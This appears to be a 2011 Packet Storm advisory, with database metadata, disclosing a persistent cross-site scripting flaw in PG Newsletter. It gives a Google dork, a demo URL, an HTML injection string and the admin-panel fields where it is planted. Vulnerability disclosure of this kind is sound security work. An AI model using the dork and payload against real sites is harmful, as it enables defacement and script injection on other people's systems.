ID PACKETSTORM:103002
Type packetstorm
Reporter r007k17-w
Modified 2011-07-13T00:00:00
Description
` %+
$.......#........4.........|).......0............\/\/ %+
%+
%+
%++++++++++++++++++++++++++++++++++++++++
# Exploit Title: PG Newsletter persistent XSS vulnerability
# Vendor: demo.newsletter.pro
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D
# My Blog: http://www.shadowrootkit.wordpress.com
# Google Dork: © 2010 PilotGroup.NET <http://www.pilotgroup.net/> Powered
by PG Newsletter Software <http://www.newsletter.pro/> - email marketing
software
****************************************************************************************************************************************************************************************
Persistent XSS Vulnerability
********************************
{DEMO} : demo.newsletter.pro/forms/index.php?sel=edit
EXPLOIT: ">><marquee><h1>XSSed_by_r007k17</h1></marquee>
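Observe: log in to the admin panel (demo). Inject this script in the create-form
page, i.e. (DEMO), in the formname field or the thankyoupageURL field.
Now observe: demo.newsletter.pro/forms/index.php
Note: the string above is plain HTML markup with no script in it. Seeing it rendered on the forms index page indicates that the stored formname / thankyoupageURL values are written back without output encoding. Planting it requires an authenticated admin session, as the steps above state.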
*****************************************************************************************************************************************************************************************
sp3c14l Thanks to s1d3 effects and my friends@!3.14--
*****************************************************************************************************************************************************************************************
`
{"reporter": "r007k17-w", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:26:51"}, "dependencies": {"references": [], "modified": "2016-11-03T10:26:51"}, "vulnersScore": -0.4}, "published": "2011-07-13T00:00:00", "cvelist": [], "lastseen": "2016-11-03T10:26:51", "history": [], "id": "PACKETSTORM:103002", "sourceHref": "https://packetstormsecurity.com/files/download/103002/pgnewsletter-xss.txt", "objectVersion": "1.2", "sourceData": "` %+ \n$.......#........4.........|).......0............\\/\\/ %+ \n \n \n%+ \n%+ \n \n \n%++++++++++++++++++++++++++++++++++++++++ \n \n \n# Exploit Title: PG Newsletter persistent XSS vulnerability \n# Vendor: demo.newsletter.pro \n# Author: $#4d0\\/\\/[r007k17] a.k.a Raghavendra Karthik D \n# My Blog: http://www.shadowrootkit.wordpress.com \n# Google Dork: \u00a9 2010 PilotGroup.NET <http://www.pilotgroup.net/> Powered \nby PG Newsletter Software <http://www.newsletter.pro/> - email marketing \nsoftware \n \n**************************************************************************************************************************************************************************************** \nPersistent XSS Vulnerability \n******************************** \n{DEMO} : demo.newsletter.pro/forms/index.php?sel=edit \nEXPLOIT: \">><marquee><h1>XSSed_by_r007k17</h1></marquee> \n \nObserve: login to the admin panel(demo).Inject this script in a create form \npage, i.e, (DEMO) in formname field or thankyoupageURL field \nNow observe: demo.newsletter.pro/forms/index.php \n \n***************************************************************************************************************************************************************************************** \nsp3c14l Thanks to s1d3 effects and my friends@!3.14-- \n***************************************************************************************************************************************************************************************** \n`\n", 
"cvss": {"vector": "NONE", "score": 0.0}, "description": "", "references": [], "edition": 1, "title": "PG Newsletter Cross Site Scripting", "type": "packetstorm", "modified": "2011-07-13T00:00:00", "hash": "58ba8283f65d65a3cf2bc4012143940ddd67fa00b1ae5ae9855b86090988aae4", "bulletinFamily": "exploit", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "0d545bdc5ecc7230c4cdb928aa6fd010", "key": "href"}, {"hash": "b8211bd77f0a5201ec7893adb3722f3e", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "b8211bd77f0a5201ec7893adb3722f3e", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9e5ecf30eafba07689a5ec6b3e130bf8", "key": "reporter"}, {"hash": "37f015e6058d0b8cfd038482f38e7a2e", "key": "sourceData"}, {"hash": "f7a4b983aa4b33831d44e6c71977d375", "key": "sourceHref"}, {"hash": "ecdfe89f0b6581cd6d2fd42abeff78f0", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "href": "https://packetstormsecurity.com/files/103002/PG-Newsletter-Cross-Site-Scripting.html", "viewCount": 0}
{}